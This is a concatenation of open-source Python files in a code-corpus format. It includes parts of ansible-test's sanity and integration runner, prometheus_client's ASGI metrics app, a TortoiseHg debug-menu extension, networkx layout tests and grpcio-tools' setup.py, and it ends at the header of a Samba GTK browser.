            errors.append('PEP 8: %s: Does not exist. Remove from legacy list (%s).' % (path, legacy_path))

    for result in results:
        path = result['path']
        line = result['line']
        column = result['column']
        code = result['code']
        message = result['message']

        msg = 'PEP 8: %s:%s:%s: %s %s' % (path, line, column, code, message)

        if path in legacy_paths:
            msg += ' (legacy)'
        else:
            msg += ' (current)'

        if path in legacy_paths and code in legacy_ignore:
            # Files on the legacy list are permitted to have errors on the legacy ignore list.
            # However, we want to report on their existence to track progress towards eliminating these exceptions.
            display.info(msg, verbosity=3)

            # summarize legacy issues by code with numbers normalized out of the message
            key = '%s %s' % (code, re.sub('[0-9]+', 'NNN', message))

            if key not in summary:
                summary[key] = 0

            summary[key] += 1
        else:
            # Files not on the legacy list and errors not on the legacy ignore list are PEP 8 policy errors.
            errors.append(msg)

    for error in errors:
        display.error(error)

    if summary:
        lines = []
        count = 0

        for key in sorted(summary):
            count += summary[key]
            lines.append('PEP 8: %5d %s' % (summary[key], key))

        display.info('PEP 8: There were %d different legacy issues found (%d total):' %
                     (len(summary), count), verbosity=1)

        display.info('PEP 8: Count Code Message', verbosity=1)

        for line in lines:
            display.info(line, verbosity=1)

    if errors:
        raise ApplicationError('PEP 8: There are %d issues which need to be resolved.' % len(errors))
def command_sanity_yamllint(args, targets):
    """Run yamllint over the applicable YAML files.

    :type args: SanityConfig
    :type targets: SanityTargets
    """
    yaml_paths = sorted(target.path for target in targets.include
                        if os.path.splitext(target.path)[1] in ('.yml', '.yaml'))

    if not yaml_paths:
        display.info('No tests applicable.', verbosity=1)
        return

    run_command(args, ['yamllint'] + yaml_paths)
def command_sanity_ansible_doc(args, targets, python_version):
    """Run ansible-doc against the applicable modules as a documentation sanity check.

    :type args: SanityConfig
    :type targets: SanityTargets
    :type python_version: str
    """
    with open('test/sanity/ansible-doc/skip.txt', 'r') as skip_fd:
        skip_modules = set(skip_fd.read().splitlines())

    modules = sorted(set(m for i in targets.include_external for m in i.modules) -
                     set(m for i in targets.exclude_external for m in i.modules) -
                     skip_modules)

    if not modules:
        display.info('No tests applicable.', verbosity=1)
        return

    env = ansible_environment(args)
    cmd = ['ansible-doc'] + modules

    stdout, stderr = intercept_command(args, cmd, env=env, capture=True, python_version=python_version)

    if stderr:
        # any stderr output (e.g. doc parsing warnings) fails the check
        display.error('Output on stderr from ansible-doc is considered an error.')
        raise SubprocessError(cmd, stderr=stderr)

    if stdout:
        display.info(stdout.strip(), verbosity=3)
def intercept_command(args, cmd, capture=False, env=None, data=None, cwd=None, python_version=None):
    """Run a command with the coverage injector placed at the front of PATH.

    :type args: TestConfig
    :type cmd: collections.Iterable[str]
    :type capture: bool
    :type env: dict[str, str] | None
    :type data: str | None
    :type cwd: str | None
    :type python_version: str | None
    :rtype: str | None, str | None
    """
    if not env:
        env = common_environment()

    cmd = list(cmd)
    escaped_cmd = ' '.join(pipes.quote(c) for c in cmd)
    inject_path = get_coverage_path(args)

    # prepend the injector directory so its interpreter shims are found first
    env['PATH'] = inject_path + os.pathsep + env['PATH']
    env['ANSIBLE_TEST_COVERAGE'] = 'coverage' if args.coverage else 'version'
    env['ANSIBLE_TEST_PYTHON_VERSION'] = python_version or args.python_version
    env['ANSIBLE_TEST_CMD'] = escaped_cmd

    return run_command(args, cmd, capture=capture, env=env, data=data, cwd=cwd)
def get_coverage_path(args):
    """Return the path of the coverage injector directory, creating it on first use.

    :type args: TestConfig
    :rtype: str
    """
    global coverage_path  # pylint: disable=locally-disabled, global-statement, invalid-name

    if coverage_path:
        # already created during this run; reuse it
        return os.path.join(coverage_path, 'coverage')

    prefix = 'ansible-test-coverage-'
    tmp_dir = '/tmp'

    if args.explain:
        # explain mode must not create anything; return a predictable dummy path
        return os.path.join(tmp_dir, '%stmp' % prefix, 'coverage')

    src = os.path.abspath(os.path.join(os.getcwd(), 'test/runner/injector/'))

    coverage_path = tempfile.mkdtemp('', prefix, dir=tmp_dir)
    # world-readable so commands run as other users can traverse into it
    os.chmod(coverage_path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)

    shutil.copytree(src, os.path.join(coverage_path, 'coverage'))
    shutil.copy('.coveragerc', os.path.join(coverage_path, 'coverage', '.coveragerc'))

    for directory in 'output', 'logs':
        os.mkdir(os.path.join(coverage_path, directory))
        # world-writable so intercepted commands can record results
        os.chmod(os.path.join(coverage_path, directory), stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)

    atexit.register(cleanup_coverage_dir)

    return os.path.join(coverage_path, 'coverage')
def cleanup_coverage_dir():
    """Copy over coverage data from temporary directory and purge temporary directory."""
    output_dir = os.path.join(coverage_path, 'output')

    for filename in os.listdir(output_dir):
        src = os.path.join(output_dir, filename)
        dst = os.path.join(os.getcwd(), 'test', 'results', 'coverage')
        shutil.copy(src, dst)

    logs_dir = os.path.join(coverage_path, 'logs')

    for filename in os.listdir(logs_dir):
        # add a random suffix so logs from multiple commands don't collide
        random_suffix = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
        new_name = '%s.%s.log' % (os.path.splitext(os.path.basename(filename))[0], random_suffix)
        src = os.path.join(logs_dir, filename)
        dst = os.path.join(os.getcwd(), 'test', 'results', 'logs', new_name)
        shutil.copy(src, dst)

    shutil.rmtree(coverage_path)
def get_changes_filter(args):
    """Return the list of targets required by detected changes (empty when unfiltered).

    :type args: TestConfig
    :rtype: list[str]
    """
    paths = detect_changes(args)

    if paths is None:
        # change detection not enabled, do not filter targets
        return []

    if not paths:
        raise NoChangesDetected()

    commands = categorize_changes(paths, args.command)
    required_targets = commands.get(args.command)

    if required_targets is None:
        raise NoTestsForChanges()

    if required_targets == ['all']:
        # changes require testing all targets, do not filter targets
        return []

    return required_targets
def detect_changes(args):
    """Determine the list of changed paths, or None when change detection is disabled.

    :type args: TestConfig
    :rtype: list[str] | None
    """
    if is_shippable():
        # CI run: derive changes from the Shippable environment
        display.info('Shippable detected, collecting parameters from environment.')
        paths = detect_changes_shippable(args)
    elif args.changed_from or args.changed_path:
        # explicit list of changed paths supplied on the command line and/or from a file
        paths = args.changed_path or []
        if args.changed_from:
            with open(args.changed_from, 'r') as changes_fd:
                paths += changes_fd.read().splitlines()
    elif args.changed:
        paths = detect_changes_local(args)
    else:
        return None  # change detection not enabled

    display.info('Detected changes in %d file(s).' % len(paths))

    for path in paths:
        display.info(path, verbosity=1)

    return paths
def detect_changes_shippable(args):
    """Initialize change detection on Shippable.
    :type args: CommonConfig
    :rtype: list[str]
    """
    result = ShippableChanges(args, Git(args))

    if result.is_pr:
        job_type = 'pull request'
    elif result.is_tag:
        job_type = 'tag'
    else:
        job_type = 'merge commit'

    display.info('Processing %s for branch %s commit %s' % (job_type, result.branch, result.commit))

    return result.paths
def detect_changes_local(args):
    """Determine changed paths from the local git checkout, honoring the tracked/staged flags.

    :type args: TestConfig
    :rtype: list[str]
    """
    git = Git(args)
    result = LocalChanges(args, git)

    display.info('Detected branch %s forked from %s at commit %s' % (
        result.current_branch, result.fork_branch, result.fork_point))

    # warn about each category of change being excluded by the current flags
    if result.untracked and not args.untracked:
        display.warning('Ignored %s untracked file(s). Use --untracked to include them.' %
                        len(result.untracked))

    if result.committed and not args.committed:
        display.warning('Ignored %s committed change(s). Omit --ignore-committed to include them.' %
                        len(result.committed))

    if result.staged and not args.staged:
        display.warning('Ignored %s staged change(s). Omit --ignore-staged to include them.' %
                        len(result.staged))

    if result.unstaged and not args.unstaged:
        display.warning('Ignored %s unstaged change(s). Omit --ignore-unstaged to include them.' %
                        len(result.unstaged))

    # union of all categories enabled by the current flags
    names = set()

    if args.tracked:
        names |= set(result.tracked)
    if args.untracked:
        names |= set(result.untracked)
    if args.committed:
        names |= set(result.committed)
    if args.staged:
        names |= set(result.staged)
    if args.unstaged:
        names |= set(result.unstaged)

    return sorted(names)
def get_integration_filter(args, targets):
    """Return environment-specific target exclusions for the active execution mode.

    :type args: IntegrationConfig
    :type targets: tuple[IntegrationTarget]
    :rtype: list[str]
    """
    if args.tox:
        # tox has the same exclusions as the local environment
        return get_integration_local_filter(args, targets)

    if args.docker:
        return get_integration_docker_filter(args, targets)

    if args.remote:
        return get_integration_remote_filter(args, targets)

    return get_integration_local_filter(args, targets)
def get_integration_local_filter(args, targets):
    """Return target exclusions which apply when running in the local environment.

    :type args: IntegrationConfig
    :type targets: tuple[IntegrationTarget]
    :rtype: list[str]
    """
    exclude = []

    if os.getuid() != 0:
        marker = 'needs/root/'
        flagged = [target.name for target in targets if marker in target.aliases]
        if flagged:
            exclude.append(marker)
            display.warning('Excluding tests marked "%s" which require running as root: %s'
                            % (marker.rstrip('/'), ', '.join(flagged)))

    # consider explicit testing of destructive as though --allow-destructive was given
    include_destructive = any(target.startswith('destructive/') for target in args.include)

    if not args.allow_destructive and not include_destructive:
        marker = 'destructive/'
        flagged = [target.name for target in targets if marker in target.aliases]
        if flagged:
            exclude.append(marker)
            display.warning('Excluding tests marked "%s" which require --allow-destructive to run locally: %s'
                            % (marker.rstrip('/'), ', '.join(flagged)))

    return exclude
def get_integration_docker_filter(args, targets):
    """Build the exclusion list for integration tests run inside a docker container.

    :type args: IntegrationConfig
    :type targets: tuple[IntegrationTarget]
    :rtype: list[str]
    """
    exclude = []

    # (alias marker, warning template) pairs, evaluated in order.
    checks = []

    if not args.docker_privileged:
        checks.append(('needs/privileged/',
                       'Excluding tests marked "%s" which require --docker-privileged to run under docker: %s'))

    if args.docker.endswith('py3'):
        checks.append(('skip/python3/',
                       'Excluding tests marked "%s" which are not yet supported on python 3: %s'))

    for marker, template in checks:
        blocked = [target.name for target in targets if marker in target.aliases]
        if blocked:
            exclude.append(marker)
            display.warning(template % (marker.rstrip('/'), ', '.join(blocked)))

    return exclude
def get_integration_remote_filter(args, targets):
    """Build the exclusion list for integration tests run on a remote instance.

    :type args: IntegrationConfig
    :type targets: tuple[IntegrationTarget]
    :rtype: list[str]
    """
    # args.remote is "platform/version"; only the platform part selects skips.
    platform = args.remote.split('/', 1)[0]

    marker = 'skip/%s/' % platform
    blocked = [target.name for target in targets if marker in target.aliases]

    if not blocked:
        return []

    display.warning('Excluding tests marked "%s" which are not yet supported on %s: %s'
                    % (marker.rstrip('/'), platform, ', '.join(blocked)))

    return [marker]
class NoChangesDetected(ApplicationWarning):
    """Exception when change detection was performed, but no changes were found."""
    def __init__(self):
        # Fixed user-facing message; carried by the (project-defined) ApplicationWarning base.
        super(NoChangesDetected, self).__init__('No changes detected.')
class NoTestsForChanges(ApplicationWarning):
    """Exception when changes detected, but no tests trigger as a result."""
    def __init__(self):
        # Fixed user-facing message; carried by the (project-defined) ApplicationWarning base.
        super(NoTestsForChanges, self).__init__('No tests found for detected changes.')
class SanityTargets(object):
    """Sanity test target information."""
    def __init__(self, include, exclude, require):
        """
        :type include: list[str]
        :type exclude: list[str]
        :type require: list[str]
        """
        # True when no explicit includes were given, i.e. all targets are in scope.
        self.all = not include
        self.targets = tuple(sorted(walk_sanity_targets()))
        # Internal targets after include/exclude/require filtering.
        self.include = walk_internal_targets(self.targets, include, exclude, require)
        # Targets delegated to external environments, split into included/excluded.
        self.include_external, self.exclude_external = walk_external_targets(self.targets, include, exclude, require)
class SanityTest(object):
    """Sanity test base class."""
    def __init__(self, name):
        # Short identifier of the sanity test (e.g. 'pep8', 'shellcheck').
        self.name = name
class SanityFunc(SanityTest):
    """Sanity test function information."""
    def __init__(self, name, func, intercept=True):
        """
        :type name: str
        :type func: (SanityConfig, SanityTargets) -> None
        :type intercept: bool
        """
        super(SanityFunc, self).__init__(name)

        # Callable implementing the test.
        self.func = func
        # Whether command interception applies when running this test.
        self.intercept = intercept
class TestConfig(EnvironmentConfig):
    """Configuration common to all test commands."""
    def __init__(self, args, command):
        """
        :type args: any
        :type command: str
        """
        super(TestConfig, self).__init__(args, command)

        # code coverage collection
        self.coverage = args.coverage  # type: bool

        # explicit target selection
        self.include = args.include  # type: list[str]
        self.exclude = args.exclude  # type: list[str]
        self.require = args.require  # type: list[str]

        # change-detection options controlling which git changes select targets
        self.changed = args.changed  # type: bool
        self.tracked = args.tracked  # type: bool
        self.untracked = args.untracked  # type: bool
        self.committed = args.committed  # type: bool
        self.staged = args.staged  # type: bool
        self.unstaged = args.unstaged  # type: bool
        self.changed_from = args.changed_from  # type: str
        self.changed_path = args.changed_path  # type: list[str]
class ShellConfig(EnvironmentConfig):
    """Configuration for the shell command."""
    def __init__(self, args):
        """
        :type args: any
        """
        # The shell command adds no options beyond the common environment configuration.
        super(ShellConfig, self).__init__(args, 'shell')
class SanityConfig(TestConfig):
    """Configuration for the sanity command."""
    def __init__(self, args):
        """
        :type args: any
        """
        super(SanityConfig, self).__init__(args, 'sanity')

        # sanity test selection options
        self.test = args.test  # type: list[str]
        self.skip_test = args.skip_test  # type: list[str]
        self.list_tests = args.list_tests  # type: bool
class IntegrationConfig(TestConfig):
    """Configuration for the integration command."""
    def __init__(self, args, command):
        """
        :type args: any
        :type command: str
        """
        super(IntegrationConfig, self).__init__(args, command)

        self.start_at = args.start_at  # type: str
        self.start_at_task = args.start_at_task  # type: str
        # Not every integration command exposes --allow-destructive, so default to False when absent.
        self.allow_destructive = args.allow_destructive if 'allow_destructive' in args else False  # type: bool
        self.retry_on_error = args.retry_on_error  # type: bool
class PosixIntegrationConfig(IntegrationConfig):
    """Configuration for the posix integration command."""
    def __init__(self, args):
        """
        :type args: any
        """
        # Plain POSIX integration adds no options of its own.
        super(PosixIntegrationConfig, self).__init__(args, 'integration')
class WindowsIntegrationConfig(IntegrationConfig):
    """Configuration for the windows integration command."""
    def __init__(self, args):
        """
        :type args: any
        """
        super(WindowsIntegrationConfig, self).__init__(args, 'windows-integration')

        # Windows versions/instances to test against.
        self.windows = args.windows  # type: list[str]
class NetworkIntegrationConfig(IntegrationConfig):
    """Configuration for the network integration command."""
    def __init__(self, args):
        """
        :type args: any
        """
        super(NetworkIntegrationConfig, self).__init__(args, 'network-integration')

        # Network platforms to test against.
        self.platform = args.platform  # type: list[str]
class UnitsConfig(TestConfig):
    """Configuration for the units command."""
    def __init__(self, args):
        """
        :type args: any
        """
        super(UnitsConfig, self).__init__(args, 'units')

        # When True, only collect the unit tests instead of running them.
        self.collect_only = args.collect_only  # type: bool
class CompileConfig(TestConfig):
    """Configuration for the compile command."""
    def __init__(self, args):
        """
        :type args: any
        """
        # The compile command adds no options beyond the common test configuration.
        super(CompileConfig, self).__init__(args, 'compile')
class Delegate(Exception):
    """Raised to request that the current command be delegated to another environment."""
    def __init__(self, exclude=None, require=None):
        """
        :type exclude: list[str] | None
        :type require: list[str] | None
        """
        super(Delegate, self).__init__()

        # Normalize falsy values (None or empty) to a fresh empty list.
        self.exclude = exclude if exclude else []
        self.require = require if require else []
class AllTargetsSkipped(ApplicationWarning):
    """All targets skipped."""
    def __init__(self):
        # Fixed user-facing message; carried by the (project-defined) ApplicationWarning base.
        super(AllTargetsSkipped, self).__init__('All targets skipped.')
# Ordered registry of sanity tests executed by the sanity command.
SANITY_TESTS = (
    # tests which ignore include/exclude (they're so fast it doesn't matter)
    SanityFunc('code-smell', command_sanity_code_smell, intercept=False),
    # tests which honor include/exclude
    SanityFunc('shellcheck', command_sanity_shellcheck, intercept=False),
    SanityFunc('pep8', command_sanity_pep8, intercept=False),
    SanityFunc('yamllint', command_sanity_yamllint, intercept=False),
    SanityFunc('validate-modules', command_sanity_validate_modules, intercept=False),
    SanityFunc('ansible-doc', command_sanity_ansible_doc),
)
| gpl-3.0 |
sserrot/champion_relationships | venv/Lib/site-packages/prometheus_client/asgi.py | 2 | 1185 | from urllib.parse import parse_qs
from .exposition import _bake_output
from .registry import REGISTRY
def make_asgi_app(registry=REGISTRY):
    """Create a ASGI app which serves the metrics from a registry."""

    async def prometheus_app(scope, receive, send):
        # Only plain HTTP requests are handled (not websocket/lifespan scopes).
        assert scope.get("type") == "http"
        # Prepare parameters
        params = parse_qs(scope.get('query_string', b''))
        # Rebuild an HTTP/1-style "Accept: ..." header line for content negotiation.
        accept_header = "Accept: " + ",".join([
            value.decode("utf8") for (name, value) in scope.get('headers')
            if name.decode("utf8") == 'accept'
        ])
        # Bake output
        status, header, output = _bake_output(registry, accept_header, params)
        # Return output
        # NOTE(review): only the first received event is inspected; chunked request
        # bodies (more_body) are not drained, and no response is sent for other
        # event types -- confirm this is acceptable for all ASGI servers in use.
        payload = await receive()
        if payload.get("type") == "http.request":
            await send(
                {
                    "type": "http.response.start",
                    "status": int(status.split(' ')[0]),
                    "headers": [
                        tuple(x.encode('utf8') for x in header)
                    ]
                }
            )
            await send({"type": "http.response.body", "body": output})

    return prometheus_app
| mit |
velorientc/git_test7 | contrib/thgdebugtools/core.py | 1 | 2554 | # core.py - top-level menus and hooks
#
# Copyright 2013 Yuya Nishihara <yuya@tcha.org>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2, incorporated herein by reference.
import gc
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from tortoisehg.hgqt import run
import dbgutil, infobar, widgets
class DebugMenuActions(dbgutil.BaseMenuActions):
    """Set up top-level debug menu"""

    def _setupMenu(self, menu):
        # Only create the InfoBar submenu when running inside the Workbench.
        if self._workbench():
            m = menu.addMenu('&InfoBar')
            infobar.InfoBarMenuActions(m, parent=self)
            self._infoBarMenu = m
            menu.aboutToShow.connect(self._updateInfoBarMenu)

        m = menu.addMenu('&Widgets')
        widgets.WidgetsMenuActions(m, parent=self)

        menu.addSeparator()

        a = menu.addAction('Run Full &Garbage Collection')
        a.triggered.connect(self.runGc)

        a = menu.addAction('') # placeholder to show gc status
        a.setEnabled(False)
        self._gcStatusAction = a

        a = menu.addAction('&Enable Garbage Collector')
        a.setCheckable(True)
        a.triggered.connect(self.setGcEnabled)
        self._gcEnabledAction = a

        # Refresh the status/checkbox entries each time the menu opens.
        menu.aboutToShow.connect(self._updateGcAction)

    @pyqtSlot()
    def _updateInfoBarMenu(self):
        # InfoBar actions only apply when a repository widget is current.
        self._infoBarMenu.setEnabled(bool(self._repoWidget()))

    @pyqtSlot()
    def runGc(self):
        found = gc.collect()
        self._information('GC Result', 'Found %d unreachable objects' % found)

    @property
    def _gcTimer(self):
        # Timer object owned by the application's GC helper (run.qtrun._gc).
        return run.qtrun._gc.timer

    def isGcEnabled(self):
        return self._gcTimer.isActive()

    @pyqtSlot(bool)
    def setGcEnabled(self, enabled):
        if enabled:
            self._gcTimer.start()
        else:
            self._gcTimer.stop()

    @pyqtSlot()
    def _updateGcAction(self):
        # Show the current gc generation counters in the disabled placeholder action.
        self._gcStatusAction.setText(' count = %s'
                                     % ', '.join(map(str, gc.get_count())))
        self._gcEnabledAction.setChecked(self.isGcEnabled())
def extsetup(ui):
    """Extension setup hook: patch qtrun so created main windows get a Debug menu."""
    class dbgqtrun(run.qtrun.__class__):
        def _createdialog(self, dlgfunc, args, opts):
            dlg, reporoot = super(dbgqtrun, self)._createdialog(dlgfunc, args,
                                                                opts)
            # Attach the debug menu to any top-level main window that was created.
            if isinstance(dlg, QMainWindow):
                m = dlg.menuBar().addMenu('&Debug')
                DebugMenuActions(m, parent=dlg)
            return dlg, reporoot

    # Swap the singleton's class in place so the override takes effect without recreating it.
    run.qtrun.__class__ = dbgqtrun
jni/networkx | networkx/drawing/tests/test_layout.py | 43 | 1870 | """Unit tests for layout functions."""
import sys
from nose import SkipTest
from nose.tools import assert_equal
import networkx as nx
class TestLayout(object):
    numpy=1 # nosetests attribute, use nosetests -a 'not numpy' to skip test

    @classmethod
    def setupClass(cls):
        # Skip the entire class when numpy is unavailable.
        global numpy
        try:
            import numpy
        except ImportError:
            raise SkipTest('numpy not available.')

    def setUp(self):
        # Fixtures: integer-node grid, string-node path, and a large grid for sparse paths.
        self.Gi=nx.grid_2d_graph(5,5)
        self.Gs=nx.Graph()
        self.Gs.add_path('abcdef')
        self.bigG=nx.grid_2d_graph(25,25) #bigger than 500 nodes for sparse

    def test_smoke_int(self):
        # Smoke test: every layout runs on a graph with (tuple-of-int) nodes.
        G=self.Gi
        vpos=nx.random_layout(G)
        vpos=nx.circular_layout(G)
        vpos=nx.spring_layout(G)
        vpos=nx.fruchterman_reingold_layout(G)
        vpos=nx.spectral_layout(G)
        vpos=nx.spectral_layout(self.bigG)
        vpos=nx.shell_layout(G)

    def test_smoke_string(self):
        # Smoke test: layouts also accept string node labels.
        G=self.Gs
        vpos=nx.random_layout(G)
        vpos=nx.circular_layout(G)
        vpos=nx.spring_layout(G)
        vpos=nx.fruchterman_reingold_layout(G)
        vpos=nx.spectral_layout(G)
        vpos=nx.shell_layout(G)

    def test_adjacency_interface_numpy(self):
        # The private FR helper accepts a dense numpy adjacency matrix directly.
        A=nx.to_numpy_matrix(self.Gs)
        pos=nx.drawing.layout._fruchterman_reingold(A)
        pos=nx.drawing.layout._fruchterman_reingold(A,dim=3)
        assert_equal(pos.shape,(6,3))

    def test_adjacency_interface_scipy(self):
        try:
            import scipy
        except ImportError:
            raise SkipTest('scipy not available.')

        # The sparse helpers accept a scipy sparse adjacency matrix directly.
        A=nx.to_scipy_sparse_matrix(self.Gs,dtype='d')
        pos=nx.drawing.layout._sparse_fruchterman_reingold(A)
        pos=nx.drawing.layout._sparse_spectral(A)
        pos=nx.drawing.layout._sparse_fruchterman_reingold(A,dim=3)
        assert_equal(pos.shape,(6,3))
| bsd-3-clause |
pmarks-net/grpc | tools/distrib/python/grpcio_tools/setup.py | 9 | 7849 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils import cygwinccompiler
from distutils import extension
from distutils import util
import errno
import os
import os.path
import pkg_resources
import platform
import re
import shlex
import shutil
import sys
import sysconfig
import setuptools
from setuptools.command import build_ext
# TODO(atash) add flag to disable Cython use
os.chdir(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.abspath('.'))
import protoc_lib_deps
import grpc_version
PY3 = sys.version_info.major == 3

# Environment variable to determine whether or not the Cython extension should
# *use* Cython or use the generated C files. Note that this requires the C files
# to have been generated by building first *with* Cython support.
BUILD_WITH_CYTHON = os.environ.get('GRPC_PYTHON_BUILD_WITH_CYTHON', False)

# There are some situations (like on Windows) where CC, CFLAGS, and LDFLAGS are
# entirely ignored/dropped/forgotten by distutils and its Cygwin/MinGW support.
# We use these environment variables to thus get around that without locking
# ourselves in w.r.t. the multitude of operating systems this ought to build on.
# We can also use these variables as a way to inject environment-specific
# compiler/linker flags. We assume GCC-like compilers and/or MinGW as a
# reasonable default.
EXTRA_ENV_COMPILE_ARGS = os.environ.get('GRPC_PYTHON_CFLAGS', None)
EXTRA_ENV_LINK_ARGS = os.environ.get('GRPC_PYTHON_LDFLAGS', None)
if EXTRA_ENV_COMPILE_ARGS is None:
  EXTRA_ENV_COMPILE_ARGS = '-std=c++11'
  if 'win32' in sys.platform:
    if sys.version_info < (3, 5):
      # We use define flags here and don't directly add to DEFINE_MACROS below to
      # ensure that the expert user/builder has a way of turning it off (via the
      # envvars) without adding yet more GRPC-specific envvars.
      # See https://sourceforge.net/p/mingw-w64/bugs/363/
      if '32' in platform.architecture()[0]:
        EXTRA_ENV_COMPILE_ARGS += ' -D_ftime=_ftime32 -D_timeb=__timeb32 -D_ftime_s=_ftime32_s'
      else:
        EXTRA_ENV_COMPILE_ARGS += ' -D_ftime=_ftime64 -D_timeb=__timeb64'
    else:
      # We need to statically link the C++ Runtime, only the C runtime is
      # available dynamically
      EXTRA_ENV_COMPILE_ARGS += ' /MT'
  elif "linux" in sys.platform or "darwin" in sys.platform:
    EXTRA_ENV_COMPILE_ARGS += ' -fno-wrapv -frtti'
if EXTRA_ENV_LINK_ARGS is None:
  EXTRA_ENV_LINK_ARGS = ''
  if "linux" in sys.platform or "darwin" in sys.platform:
    EXTRA_ENV_LINK_ARGS += ' -lpthread'
  elif "win32" in sys.platform and sys.version_info < (3, 5):
    msvcr = cygwinccompiler.get_msvcr()[0]
    # TODO(atash) sift through the GCC specs to see if libstdc++ can have any
    # influence on the linkage outcome on MinGW for non-C++ programs.
    EXTRA_ENV_LINK_ARGS += (
        ' -static-libgcc -static-libstdc++ -mcrtdll={msvcr} '
        '-static'.format(msvcr=msvcr))

EXTRA_COMPILE_ARGS = shlex.split(EXTRA_ENV_COMPILE_ARGS)
EXTRA_LINK_ARGS = shlex.split(EXTRA_ENV_LINK_ARGS)

# Source/include paths from protoc_lib_deps, normalized for the host OS.
CC_FILES = [
    os.path.normpath(cc_file) for cc_file in protoc_lib_deps.CC_FILES]
PROTO_FILES = [
    os.path.normpath(proto_file) for proto_file in protoc_lib_deps.PROTO_FILES]
CC_INCLUDE = os.path.normpath(protoc_lib_deps.CC_INCLUDE)
PROTO_INCLUDE = os.path.normpath(protoc_lib_deps.PROTO_INCLUDE)

GRPC_PYTHON_TOOLS_PACKAGE = 'grpc_tools'
GRPC_PYTHON_PROTO_RESOURCES_NAME = '_proto'

DEFINE_MACROS = ()
if "win32" in sys.platform:
  DEFINE_MACROS += (('WIN32_LEAN_AND_MEAN', 1),)
  if '64bit' in platform.architecture()[0]:
    DEFINE_MACROS += (('MS_WIN64', 1),)
elif "linux" in sys.platform or "darwin" in sys.platform:
  DEFINE_MACROS += (('HAVE_PTHREAD', 1),)

# By default, Python3 distutils enforces compatibility of
# c plugins (.so files) with the OSX version Python3 was built with.
# For Python3.4, this is OSX 10.6, but we need Thread Local Support (__thread)
if 'darwin' in sys.platform and PY3:
  mac_target = sysconfig.get_config_var('MACOSX_DEPLOYMENT_TARGET')
  if mac_target and (pkg_resources.parse_version(mac_target) <
                     pkg_resources.parse_version('10.9.0')):
    os.environ['MACOSX_DEPLOYMENT_TARGET'] = '10.9'
    os.environ['_PYTHON_HOST_PLATFORM'] = re.sub(
        r'macosx-[0-9]+\.[0-9]+-(.+)',
        r'macosx-10.9-\1',
        util.get_platform())
def package_data():
    """Stage the bundled .proto files inside the grpc_tools package tree.

    Copies every file from PROTO_INCLUDE into the package's proto resources
    directory and returns the package_data mapping to pass to setup().
    """
    tools_path = GRPC_PYTHON_TOOLS_PACKAGE.replace('.', os.path.sep)
    staging_root = os.path.join(tools_path, GRPC_PYTHON_PROTO_RESOURCES_NAME)

    staged = []
    for proto_file in PROTO_FILES:
        source = os.path.join(PROTO_INCLUDE, proto_file)
        target = os.path.join(staging_root, proto_file)
        try:
            os.makedirs(os.path.dirname(target))
        except OSError as error:
            # The directory may already exist from a previous file; anything else is fatal.
            if error.errno != errno.EEXIST:
                raise
        shutil.copy(source, target)
        staged.append(os.path.join(GRPC_PYTHON_PROTO_RESOURCES_NAME, proto_file))

    return {GRPC_PYTHON_TOOLS_PACKAGE: staged}
def extension_modules():
    """Return the native extension modules for setup(), cythonizing when enabled."""
    # The Cython build compiles the .pyx; otherwise the pre-generated C++ file is used.
    compiler_source = '_protoc_compiler.pyx' if BUILD_WITH_CYTHON else '_protoc_compiler.cpp'

    plugin_sources = [
        os.path.join('grpc_tools', compiler_source),
        os.path.join('grpc_tools', 'main.cc'),
        os.path.join('grpc_root', 'src', 'compiler', 'python_generator.cc'),
    ]
    plugin_sources.extend(os.path.join(CC_INCLUDE, cc_file) for cc_file in CC_FILES)

    plugin_ext = extension.Extension(
        name='grpc_tools._protoc_compiler',
        sources=plugin_sources,
        include_dirs=[
            '.',
            'grpc_root',
            os.path.join('grpc_root', 'include'),
            CC_INCLUDE,
        ],
        language='c++',
        define_macros=list(DEFINE_MACROS),
        extra_compile_args=list(EXTRA_COMPILE_ARGS),
        extra_link_args=list(EXTRA_LINK_ARGS),
    )

    extensions = [plugin_ext]
    if BUILD_WITH_CYTHON:
        from Cython import Build
        return Build.cythonize(extensions)
    return extensions
# Package entry point: metadata plus the native protoc compiler plugin build.
setuptools.setup(
  name='grpcio-tools',
  version=grpc_version.VERSION,
  license='3-clause BSD',
  ext_modules=extension_modules(),
  packages=setuptools.find_packages('.'),
  install_requires=[
    'protobuf>=3.0.0',
    'grpcio>={version}'.format(version=grpc_version.VERSION),
  ],
  # Ship the staged .proto files alongside the package.
  package_data=package_data(),
)
| bsd-3-clause |
wkritzinger/asuswrt-merlin | release/src/router/samba3/source/python/gtkdictbrowser.py | 55 | 7283 | #!/usr/bin/python
#
# Browse a Python dictionary in a two pane graphical interface written
# in GTK.
#
# The GtkDictBrowser class is supposed to be generic enough to allow
